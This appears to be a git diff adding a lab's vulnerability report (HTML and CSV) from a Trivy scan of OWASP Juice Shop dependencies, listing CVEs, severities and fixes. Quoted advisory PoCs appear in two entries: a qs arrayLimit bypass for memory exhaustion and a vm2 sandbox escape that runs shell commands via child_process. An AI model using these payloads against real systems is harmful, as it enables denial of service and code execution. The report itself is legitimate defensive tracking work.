+3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0.

+

The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this
+issue, as the HTTP client implementation is outside the OpenSSL FIPS module
+boundary.

+ + +
Mitigation
+

3.0.17-1~deb12u3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2025/09/30/5
+https://access.redhat.com/security/cve/CVE-2025-9232
+https://github.com/advisories/GHSA-76r2-c3cg-f5r9
+https://github.com/openssl/openssl/commit/2b4ec20e47959170422922eaff25346d362dcb35
+https://github.com/openssl/openssl/commit/654dc11d23468a74fc8ea4672b702dd3feb7be4b
+https://github.com/openssl/openssl/commit/7cf21a30513c9e43c4bc3836c237cf086e194af3
+https://github.com/openssl/openssl/commit/89e790ac431125a4849992858490bed6b225eadf
+https://github.com/openssl/openssl/commit/bbf38c034cdabd0a13330abcc4855c866f53d2e0
+https://nvd.nist.gov/vuln/detail/CVE-2025-9232
+https://openssl-library.org/news/secadv/20250930.txt
+https://ubuntu.com/security/notices/USN-7786-1
+https://ubuntu.com/security/notices/USN-7894-1
+https://www.cve.org/CVERecord?id=CVE-2025-9232

+ + + + + + + +
+
+
+
+ Finding 66: CVE-2022-27943 Libstdc++6 12.2.0-14+deb12u1 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 674 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libstdc++612.2.0-14+deb12u1
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

binutils: libiberty/rust-demangle.c in GNU GCC 11.2 allows stack exhaustion in demangle_const
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

libiberty/rust-demangle.c in GNU GCC 11.2 allows stack consumption in demangle_const, as demonstrated by nm-new.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-27943
+https://gcc.gnu.org/bugzilla/show_bug.cgi?id=105039
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=1a770b01ef415e114164b6151d1e55acdee09371
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=9234cdca6ee88badfc00297e72f13dac4e540c79
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=fc968115a742d9e4674d9725ce9c2106b91b6ead
+https://gcc.gnu.org/pipermail/gcc-patches/2022-March/592244.html
+https://lists.fedoraproject.org/archives/list/package- +announce%40lists.fedoraproject.org/message/ +H424YXGW7OKXS2NCAP35OP6Y4P4AW6VG/
+https://nvd.nist.gov/vuln/detail/CVE-2022-27943
+https://sourceware.org/bugzilla/show_bug.cgi?id=28995
+https://www.cve.org/CVERecord?id=CVE-2022-27943

+ + + + + + + +
+
+
+
+ Finding 67: CVE-2026-3449 @Tootallnate/Once 1.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 705 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
@tootallnate/once1.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/@tootallnate/once/package.json
+
+
+
+ + + + + +
Description
+

@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.0.1

+

Versions of the package @tootallnate/once before 3.0.1 are vulnerable + to Incorrect Control Flow Scoping in promise resolving when AbortSignal + option is used. The Promise remains in a permanently pending state +after the signal is aborted, causing any await or .then() usage to hang +indefinitely. This can cause a control-flow leak that can lead to +stalled requests, blocked workers, or degraded application availability.

+ + +
Mitigation
+

3.0.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-3449
+https://github.com/TooTallNate/once
+https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a
+https://github.com/TooTallNate/once/issues/8
+https://nvd.nist.gov/vuln/detail/CVE-2026-3449
+https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612
+https://www.cve.org/CVERecord?id=CVE-2026-3449

+ + + + + + + +
+
+
+
+ Finding 68: CVE-2026-3449 @Tootallnate/Once 2.0.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 705 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
@tootallnate/once2.0.0
+ + + + + + + +
File Path
juice-shop/node_modules/@tootallnate/once/package.json
+
+
+
+ + + + + +
Description
+

@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.0.1

+

Versions of the package @tootallnate/once before 3.0.1 are vulnerable + to Incorrect Control Flow Scoping in promise resolving when AbortSignal + option is used. The Promise remains in a permanently pending state +after the signal is aborted, causing any await or .then() usage to hang +indefinitely. This can cause a control-flow leak that can lead to +stalled requests, blocked workers, or degraded application availability.

+ + +
Mitigation
+

3.0.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-3449
+https://github.com/TooTallNate/once
+https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a
+https://github.com/TooTallNate/once/issues/8
+https://nvd.nist.gov/vuln/detail/CVE-2026-3449
+https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612
+https://www.cve.org/CVERecord?id=CVE-2026-3449

+ + + + + + + +
+
+
+
+ Finding 185: CVE-2026-2391 Qs 6.13.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 20 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
qs6.13.0
+ + + + + + + +
File Path
juice-shop/node_modules/qs/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

+ + +
Description
+

qs: qs's arrayLimit bypass in comma parsing allows denial of service
+Target: Node.js
+Type: node-pkg
+Fixed version: 6.14.2

+

Summary

+

The arrayLimit option in qs does not enforce limits for comma-separated values when comma: true + is enabled, allowing attackers to cause denial-of-service via memory +exhaustion. This is a bypass of the array limit enforcement, similar to +the bracket notation bypass addressed in GHSA-6rw7-vpxm-498p +(CVE-2025-15284).

+

Details

+

When the comma option is set to true (not the default, but configurable in applications), qs allows parsing comma-separated strings as arrays (e.g., ?param=a,b,c becomes ['a', 'b', 'c']). However, the limit check for arrayLimit (default: 20) and the optional throwOnLimitExceeded occur after the comma-handling logic in parseArrayValue, + enabling a bypass. This permits creation of arbitrarily large arrays +from a single parameter, leading to excessive memory allocation.

+

Vulnerable code (lib/parse.js: lines ~40-50):

+
if (val && typeof val === 'string' && options.comma && val.indexOf(',') > -1) {
+    return val.split(',');
+}
+
+if (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {
+    throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');
+}
+
+return val;
+
+ +

The split(',') returns the array immediately, skipping the subsequent limit check. Downstream merging via utils.combine + does not prevent allocation, even if it marks overflows for sparse +arrays.This discrepancy allows attackers to send a single parameter with + millions of commas (e.g., ?param=,,,,,,,,...), allocating massive arrays in memory without triggering limits. It bypasses the intent of arrayLimit, which is enforced correctly for indexed (a[0]=) and bracket (a[]=) notations (the latter fixed in v6.14.1 per GHSA-6rw7-vpxm-498p).

+

PoC

+

Test 1 - Basic bypass:

+
npm install qs
+
+ +
const qs = require('qs');
+
+const payload = 'a=' + ','.repeat(25);  // 26 elements after split (bypasses arrayLimit: 5)
+const options = { comma: true, arrayLimit: 5, throwOnLimitExceeded: true };
+
+try {
+  const result = qs.parse(payload, options);
+  console.log(result.a.length);  // Outputs: 26 (bypass successful)
+} catch (e) {
+  console.log('Limit enforced:', e.message);  // Not thrown
+}
+
+ +

Configuration:
+- comma: true
+- arrayLimit: 5
+- throwOnLimitExceeded: true

+

Expected: Throws "Array limit exceeded" error.
+Actual: Parses successfully, creating an array of length 26.

+

Impact

+

Denial of Service (DoS) via memory exhaustion.

+ + +
Mitigation
+

6.14.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-2391
+https://github.com/ljharb/qs
+https://github.com/ljharb/qs/commit/f6a7abff1f13d644db9b05fe4f2c98ada6bf8482
+https://github.com/ljharb/qs/security/advisories/GHSA-w7fw-mjwx-w883
+https://nvd.nist.gov/vuln/detail/CVE-2026-2391
+https://www.cve.org/CVERecord?id=CVE-2026-2391

+ + + + + + + +
+
+
+
+ Finding 127: CVE-2025-57349 Messageformat 2.3.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
messageformat2.3.0
+ + + + + + + +
File Path
juice-shop/node_modules/messageformat/package.json
+
+
+
+ + + + + +
Description
+

messageformat has a prototype pollution vulnerability
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.0.0-beta.0

+

The messageformat package, an implementation of the Unicode +MessageFormat 2 specification for JavaScript, is vulnerable to prototype + pollution due to improper handling of message key paths in versions +prior to 2.3.0. The flaw arises when processing nested message keys +containing special characters (e.g., proto ), which can + lead to unintended modification of the JavaScript Object prototype. +This vulnerability may allow a remote attacker to inject properties into + the global object prototype via specially crafted message input, +potentially causing denial of service or other undefined behaviors in +applications using the affected component.

+ + +
Mitigation
+

3.0.0-beta.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/messageformat/messageformat
+https://github.com/messageformat/messageformat/issues/452
+https://nvd.nist.gov/vuln/detail/CVE-2025-57349

+ + + + + + + +
+
+
+
+ Finding 27: CVE-2022-27943 GCC-12-Base 12.2.0-14+deb12u1 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 674 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
gcc-12-base12.2.0-14+deb12u1
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

binutils: libiberty/rust-demangle.c in GNU GCC 11.2 allows stack exhaustion in demangle_const
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

libiberty/rust-demangle.c in GNU GCC 11.2 allows stack consumption in demangle_const, as demonstrated by nm-new.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-27943
+https://gcc.gnu.org/bugzilla/show_bug.cgi?id=105039
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=1a770b01ef415e114164b6151d1e55acdee09371
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=9234cdca6ee88badfc00297e72f13dac4e540c79
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=fc968115a742d9e4674d9725ce9c2106b91b6ead
+https://gcc.gnu.org/pipermail/gcc-patches/2022-March/592244.html
+https://lists.fedoraproject.org/archives/list/package- +announce%40lists.fedoraproject.org/message/ +H424YXGW7OKXS2NCAP35OP6Y4P4AW6VG/
+https://nvd.nist.gov/vuln/detail/CVE-2022-27943
+https://sourceware.org/bugzilla/show_bug.cgi?id=28995
+https://www.cve.org/CVERecord?id=CVE-2022-27943

+ + + + + + + +
+
+
+
+ Finding 84: CVE-2024-47764 Cookie 0.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 74 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
cookie0.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/engine.io/node_modules/cookie/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

cookie: cookie accepts cookie name, path, and domain with out of bounds characters
+Target: Node.js
+Type: node-pkg
+Fixed version: 0.7.0

+

cookie is a basic HTTP cookie parser and serializer for HTTP servers. + The cookie name could be used to set other fields of the cookie, +resulting in an unexpected cookie value. A similar escape can be used +for path and domain, which could be abused to alter other fields of the +cookie. Upgrade to 0.7.0, which updates the validation for name, path, +and domain.

+ + +
Mitigation
+

0.7.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2024-47764
+https://github.com/jshttp/cookie
+https://github.com/jshttp/cookie/commit/e10042845354fea83bd8f34af72475eed1dadf5c
+https://github.com/jshttp/cookie/pull/167
+https://github.com/jshttp/cookie/security/advisories/GHSA-pxg6-pf52-xh8x
+https://nvd.nist.gov/vuln/detail/CVE-2024-47764
+https://www.cve.org/CVERecord?id=CVE-2024-47764

+ + + + + + +
+
+ +
+ + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/labs/lab10/report/findings.csv b/labs/lab10/report/findings.csv new file mode 100644 index 00000000..517000f2 --- /dev/null +++ b/labs/lab10/report/findings.csv @@ -0,0 +1,246 @@ +DEDUPLICATION_DEFERRED_FIELDS,DEDUPLICATION_FIELDS,active,active_endpoint_count,active_endpoints,component_name,component_version,created,cvssv3,cvssv3_score,cvssv4,cvssv4_score,cwe,date,defect_review_requested_by,defect_review_requested_by_id,description,duplicate,duplicate_finding,duplicate_finding_id,dynamic_finding,effort_for_fixing,epss_percentile,epss_score,false_p,file_path,finding_group,fix_available,fix_version,has_endpoints,has_finding_group,has_jira_configured,has_jira_group_issue,has_jira_issue,hash_code,id,impact,is_mitigated,kev_date,known_exploited,last_reviewed,last_reviewed_by,last_reviewed_by_id,last_status_update,line,mitigated,mitigated_by,mitigated_by_id,mitigated_endpoint_count,mitigated_endpoints,mitigation,nb_occurences,numerical_severity,out_of_scope,param,payload,pgh_event_models,pk,planned_remediation_date,planned_remediation_version,publish_date,ransomware_used,references,reporter,reporter_id,review_requested_by,review_requested_by_id,risk_accepted,sast_sink_object,sast_source_file_path,sast_source_line,sast_source_object,scanner_confidence,service,severity,severity_justification,sla_age,sla_age_days,sla_days_remaining,sla_deadline,sla_expiration_date,sla_start_date,sonarqube_issue,sonarqube_issue_id,static_finding,steps_to_reproduce,test,test_id,thread_id,title,under_defect_review,under_review,unique_id_from_tool,updated,url,verified,violates_sla,vuln_id_from_tool,test,found_by,engagement_id,engagement,product_id,product,endpoints,vulnerability_ids,tags,status,notes +,,True,0,[],marsdb,0.6.11,2026-05-12 17:37:05.190863+00:00,,,,,0,2026-05-12,,,"Command Injection in marsdb NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** NEWLINE NEWLINE All versions of `marsdb` are vulnerable to Command Injection. In the `DocumentMatcher` class, selectors on `$where` clauses are passed to a Function constructor unsanitized. This allows attackers to run arbitrary commands in the system when the function is executed. NEWLINE NEWLINE NEWLINE ## Recommendation NEWLINE NEWLINE No fix is currently available. Consider using an alternative package until a fix is made available. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/marsdb/package.json,,False,,False,False,,False,,73423daa2c85b788f33d85d5bb7d840df7952a4d3b32020edcf6e585c1b5cbd3,126,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.190920+00:00,,,,,0,[],,,S0,False,,,,,,,,False,https://github.com/bkimminich/juice-shop/issues/1173 NEWLINE https://www.npmjs.com/advisories/1122,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,GHSA-5mrr-rgp6-x4gr Marsdb 0.6.11,False,False,,2026-05-12 17:37:05.190872+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,GHSA-5mrr-rgp6-x4gr,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],lodash,2.4.2,2026-05-12 17:37:05.154239+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H,9.1,,,1321,2026-05-12,,,nodejs-lodash: prototype pollution in defaultsDeep function leading to modifying properties NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.17.12 NEWLINE NEWLINE Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload. NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json,,True,,False,False,,False,,36d1f6cbd728c605224c27e71649f332318dee2693aeaf53d68c060e2a8828e1,117,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.154298+00:00,,,,,0,[],4.17.12,,S0,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2019:3024 NEWLINE https://access.redhat.com/security/cve/CVE-2019-10744 NEWLINE https://github.com/advisories/GHSA-jf85-cpcp-j695 NEWLINE https://github.com/lodash/lodash/pull/4336 NEWLINE https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2019-10744.yml NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2019-10744 NEWLINE https://security.netapp.com/advisory/ntap-20191004-0005 NEWLINE https://security.netapp.com/advisory/ntap-20191004-0005/ NEWLINE https://snyk.io/vuln/SNYK-JS-LODASH-450202 NEWLINE https://support.f5.com/csp/article/K47105354 NEWLINE https://support.f5.com/csp/article/K47105354?utm_source=f5support&%3Butm_medium=RSS NEWLINE https://support.f5.com/csp/article/K47105354?utm_source=f5support&utm_medium=RSS NEWLINE https://www.cve.org/CVERecord?id=CVE-2019-10744 NEWLINE https://www.npmjs.com/advisories/1065 NEWLINE https://www.oracle.com/security-alerts/cpujan2021.html NEWLINE https://www.oracle.com/security-alerts/cpuoct2020.html,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2019-10744 Lodash 2.4.2,False,False,,2026-05-12 17:37:05.154249+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2019-10744,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],jsonwebtoken,0.4.0,2026-05-12 17:37:05.126062+00:00,CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,20,2026-05-12,,,nodejs-jsonwebtoken: verification step bypass with an altered token NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.2.2 NEWLINE NEWLINE In jsonwebtoken node module before 4.2.2 it is possible for an attacker to bypass verification when a token digitally signed with an asymmetric key (RS/ES family) of algorithms but instead the attacker send a token digitally signed with a symmetric algorithm (HS* family). NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/jsonwebtoken/package.json,,True,,False,False,,False,,756ae4892999afe288492599f018ef7426e7cfb8e4ea4527a6d71357a3503db7,110,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.126119+00:00,,,,,0,[],4.2.2,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2015-9235 NEWLINE https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries NEWLINE https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/ NEWLINE https://github.com/advisories/GHSA-c7hr-j4mj-j2w6 NEWLINE https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687 NEWLINE https://nodesecurity.io/advisories/17 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2015-9235 NEWLINE https://www.cve.org/CVERecord?id=CVE-2015-9235 NEWLINE https://www.npmjs.com/advisories/17 NEWLINE https://www.timmclean.net/2015/02/25/jwt-alg-none.html,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2015-9235 Jsonwebtoken 0.4.0,False,False,,2026-05-12 17:37:05.126071+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2015-9235,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],jsonwebtoken,0.1.0,2026-05-12 17:37:05.104683+00:00,CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,20,2026-05-12,,,nodejs-jsonwebtoken: verification step bypass with an altered token NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.2.2 NEWLINE NEWLINE In jsonwebtoken node module before 4.2.2 it is possible for an attacker to bypass verification when a token digitally signed with an asymmetric key (RS/ES family) of algorithms but instead the attacker send a token digitally signed with a symmetric algorithm (HS* family). NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json,,True,,False,False,,False,,878f89d0598d0236b88290febfb1899b96561b65699661be3627ae77f59954b3,105,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.104737+00:00,,,,,0,[],4.2.2,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2015-9235 NEWLINE https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries NEWLINE https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/ NEWLINE https://github.com/advisories/GHSA-c7hr-j4mj-j2w6 NEWLINE https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687 NEWLINE https://nodesecurity.io/advisories/17 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2015-9235 NEWLINE https://www.cve.org/CVERecord?id=CVE-2015-9235 NEWLINE https://www.npmjs.com/advisories/17 NEWLINE https://www.timmclean.net/2015/02/25/jwt-alg-none.html,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2015-9235 Jsonwebtoken 0.1.0,False,False,,2026-05-12 17:37:05.104691+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2015-9235,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],handlebars,4.7.7,2026-05-12 17:37:05.056984+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,94,2026-05-12,,,"handlebars.js: Handlebars: Remote Code Execution via crafted Abstract Syntax Tree object in compile() NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.7.9 NEWLINE NEWLINE Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, `Handlebars.compile()` accepts a pre-parsed AST object in addition to a template string. The `value` field of a `NumberLiteral` AST node is emitted directly into the generated JavaScript without quoting or sanitization. An attacker who can supply a crafted AST to `compile()` can therefore inject and execute arbitrary JavaScript, leading to Remote Code Execution on the server. Version 4.7.9 fixes the issue. Some workarounds are available. Validate input type before calling `Handlebars.compile()`; ensure the argument is always a `string`, never a plain object or JSON-deserialized value. Use the Handlebars runtime-only build (`handlebars/runtime`) on the server if templates are pre-compiled at build time; `compile()` will be unavailable. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/handlebars/package.json,,True,,False,False,,False,,00118738db04e15491aa9ece80b707f00a55442cd91d7330d1c646bc02fbbc3b,93,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.057038+00:00,,,,,0,[],4.7.9,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-33937 NEWLINE https://github.com/handlebars-lang/handlebars.js NEWLINE https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2 NEWLINE https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9 NEWLINE https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2w6w-674q-4c4q NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-33937 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-33937,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-33937 Handlebars 4.7.7,False,False,,2026-05-12 17:37:05.056992+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-33937,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.601796+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H,10.0,,,0,2026-05-12,,,"vm2 has a Sandbox Escape Vulnerability NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.0 NEWLINE NEWLINE ### Summary NEWLINE NEWLINE It is possible to reach `BaseHandler.getPrototypeOf`, which can be used to get arbitrary prototypes NEWLINE NEWLINE ### Details NEWLINE NEWLINE https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658 NEWLINE NEWLINE `BaseHandler` can be reached via `util.inspect` (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8) NEWLINE NEWLINE ### PoC NEWLINE ```js NEWLINE let obj = { NEWLINE subarray: Buffer.prototype.inspect, NEWLINE slice: Buffer.prototype.slice, NEWLINE hexSlice: () => '', NEWLINE }; NEWLINE NEWLINE let sym; NEWLINE NEWLINE obj.slice(10, { NEWLINE showHidden: true, NEWLINE showProxy: true, NEWLINE depth: 10, NEWLINE stylize(a) { NEWLINE const handler = this.seen && this.seen[1]; NEWLINE NEWLINE if (handler && handler.getPrototypeOf) { NEWLINE gP = handler.getPrototypeOf; NEWLINE HObjectProto = gP(gP(gP(gP(Buffer)))); NEWLINE HObject = HObjectProto.constructor; NEWLINE sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0); NEWLINE } NEWLINE return a; NEWLINE }, NEWLINE }); NEWLINE NEWLINE obj = { NEWLINE [sym]: (depth, opt, inspect) => { NEWLINE inspect.constructor('return process')() NEWLINE .getBuiltinModule('child_process') NEWLINE .execSync('id', { stdio: 'inherit' }); NEWLINE }, NEWLINE valueOf: undefined, NEWLINE constructor: undefined, NEWLINE }; NEWLINE NEWLINE WebAssembly.compileStreaming(obj).catch(() => {}); NEWLINE ``` NEWLINE NEWLINE ### Impact NEWLINE Sandbox Escape -> RCE NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,b91f14093022b42a30684e8977b0f3d5295810a3907a3de01067a46d150cbea2,230,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.601849+00:00,,,,,0,[],3.11.0,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-qcp4-v2jj-fjx8,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-44006 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.601804+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-44006,lang-pkgs; node-pkg,"Active, Verified", 